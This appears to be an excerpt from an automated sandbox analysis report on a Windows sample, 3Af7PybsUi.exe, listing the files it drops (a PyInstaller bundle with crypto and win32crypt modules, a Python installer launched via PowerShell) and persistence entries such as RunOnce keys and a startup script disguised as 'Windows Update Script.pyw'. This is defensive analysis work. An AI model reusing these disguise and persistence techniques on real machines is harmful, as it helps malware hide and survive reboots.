Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_cffi_backend.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\win32\win32crypt.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_overlapped.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\winsound.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\select.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Pythonwin\win32ui.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\python312.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\Lib\venv\scripts\nt\pythonw.exeJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\python3.dllJump to dropped file
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeFile created: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\libffi-8.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_zoneinfo.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_ssl.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\libcrypto-1_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_wmi.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_overlapped.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeFile created: C:\Users\user\AppData\Local\Temp\{3924CCB2-4D94-4EC4-A7EF-4C83FEEBF7C7}\.ba\PythonBA.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeFile created: C:\Users\user~1\AppData\Local\Temp\DEL54BE.tmp (copy)Jump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Pythonwin\mfc140u.dllJump to dropped file
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeFile created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeFile created: C:\Users\user\AppData\Local\Temp\{0A1148D0-6B5F-43A6-B19B-31E0405F20B5}\.ba\PythonBA.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\win32\win32trace.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\sqlite3.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\libffi-8.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\select.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\win32\win32api.pydJump to dropped file
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeFile created: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.ba\PythonBA.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeFile created: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeJump to dropped file
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeFile created: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\LICENSE.txt

Boot Survival

barindex
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {7f8381ad-2e42-4432-8de5-c7beebe1009f}Jump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Update Script.pywJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SystemRestoreJump to behavior
Source: C:\Windows\System32\SrTasks.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Update Script.pywJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 3.11
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 3.11\Python 3.11 (64-bit).lnk
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {7f8381ad-2e42-4432-8de5-c7beebe1009f}Jump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {7f8381ad-2e42-4432-8de5-c7beebe1009f}Jump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {7f8381ad-2e42-4432-8de5-c7beebe1009f}Jump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {7f8381ad-2e42-4432-8de5-c7beebe1009f}Jump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262950B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF7262950B0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
